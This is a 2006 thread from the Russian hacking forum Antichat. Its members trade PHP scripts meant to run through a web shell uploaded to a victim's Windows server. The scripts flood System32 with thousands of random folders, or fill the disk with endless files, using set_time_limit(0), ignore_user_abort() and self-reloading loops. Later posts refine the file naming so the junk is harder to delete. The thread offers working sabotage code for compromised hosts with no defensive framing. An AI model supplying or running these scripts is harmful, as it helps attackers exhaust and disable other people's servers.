Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Php способ засорения системных папок |
15.10.2006, 17:49
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Php способ засорения системных папок
Хай! За ошибки не бить, я по клаве не попадаю 
Я конечно изобрёл велосипед, но часто бывает, заливаешь шелл на апач под виндоус, а ничего сделать особо не получается, т.к. стоит файерволл и антивирус. Так вот, от нечего делать придумал как засорить через PHP систему. Всем известно, если в system32 много мусора, комп начинает жестоко виснуть, незнаю как насчёт линукса, никогда в нём не работал, и системных папок вобще незнаю в нём, но сейчас не об этом! Так вот, написал такой вот приметивный скрипт
Код:
<?php for($i=0;$i<5000;$i++)
{
@mkdir('C:/WINDOWS/System32/'.md5(rand(1,99999999999999999).rand(1,99999999999999999)));
}
header("Location: ".$_SERVER[REQUEST_URI]); ?>
Значить скрипт работает так:
Генерирует 2 числа от 1 до 99999999999999999 склеивает их, шифрует методом MD5 и создаёт в System32 папку с этим именем (32 символа) вот всё это выполняется 5000 рах! Тоесть 5000 папок в System32 это ещё не всё  т.к. многие админы не настраивают особо конфиги, и если скрипт неуспевает выполниться за 30 сек, тогда апач выдаёт ошибку! Поэтому после создания 5000 папок, скрипт заканчивает свою работу и перекидывает снова на эту страницу, и всё идёт заново! Тоесть 2-3 минуты работы скрипта и комп перегреется Кстати чтоб удалить 5000 папок надо 10 минут! Я пробовал Ну... Кажись всё! |
|
|
15.10.2006, 19:46
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
Кстати чтоб удалить 5000 папок надо 10 минут! Я пробовал
ну если тока вручную..
многие админы не настраивают особо конфиги
set_time_limit(0);
|
|
|
|
15.10.2006, 22:30
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Это не настолько интересно, как ignore_user_abort();
Тоже самое делал. Только скрипт создавал файлы каждую секунду, и в имени было время.
PHP код:
<?php
set_time_limit(0);
ignore_user_abort(); // Аминь...
while(true) {
$fp=fopen("test".time().".txt","w");
fwrite($fp,php_uname());
fclose($fp);
}
?>
Чё-т тип такого. Вроде как ничего не происходит, но обновив папку с скриптом, увидете результат.
Последний раз редактировалось Dr.Check; 16.10.2006 в 12:28..
|
|
|
|
16.10.2006, 08:20
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Dr.Check, скрипт супер! Я просто в шоке! Но... Он создаёт раз в секунду. потому-что ты используешь time и он неможет создать с одинаковыми именами! Вот отрывок моего+твой это бомба!
PHP код:
<?php
set_time_limit(0);
ignore_user_abort();
while(true) {
$fp=fopen(md5(rand(1,99999999999999999).rand(1,99999999999999999).rand(1,99999999999999999)).".txt","w");
fwrite($fp,time());
fclose($fp);
}
?>
|
|
|
|
16.10.2006, 13:22
|
|
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме:
457850
Репутация:
174
|
|
Нет пончик ты не понял идею DrCheck. В хеше НАЗВАНИЯ файла должно быть time() а не в теле файла.
|
|
|
|
16.10.2006, 13:52
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
В хеше НАЗВАНИЯ файла - непонял эту фразу... В общем в название файла записывается хэш, если писать время, то...
1)Он будет моздаваться раз в минуту
2)Весь этот муор легко будет удалить, т.к. он будет сортироваться по имени из цифр, а так хэш можен начинаться как с цифр так и с букв, его протсо так не отсортируешь, ну по дате можно и по именам в 32 буквы!
А в тело пишется не хеш, как ты понял (по моему) а дата, это в имя хэш пишется  В общем за 1 минуту эта штука мне создала материала на 50МБ!  |
|
|
|
16.10.2006, 14:39
|
|
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме:
457850
Репутация:
174
|
|
1)Он будет моздаваться раз в минуту
раз в СЕКУНДУ
2)Весь этот муор легко будет удалить, т.к. он будет сортироваться по имени из цифр, а так хэш можен начинаться как с цифр так и с букв, его протсо так не отсортируешь, ну по дате можно и по именам в 32 буквы!
md5(time().doubleval(microtime()))
|
|
|
|
16.10.2006, 14:46
|
|
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме:
457850
Репутация:
174
|
|
Также можно исползьвать ф-ю file_exists и счетчик
|
|
|
|
16.10.2006, 16:57
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Весь этот муор легко будет удалить
Ну да, особенно, когда файлы создаются, и создаются...
|
|
|
|
16.10.2006, 17:18
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
угу... один говорит, что отсортировать по числам и удалить можно. и идея перца обвиняющего не лучше - 32 символа хеш то! отсортировал по длине и не парся )))
можт проще длину динамической делать и спецсимволы добавлять? а не только мелкую латиницу и цифры, но и заглавные и подчеркивания/тире?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
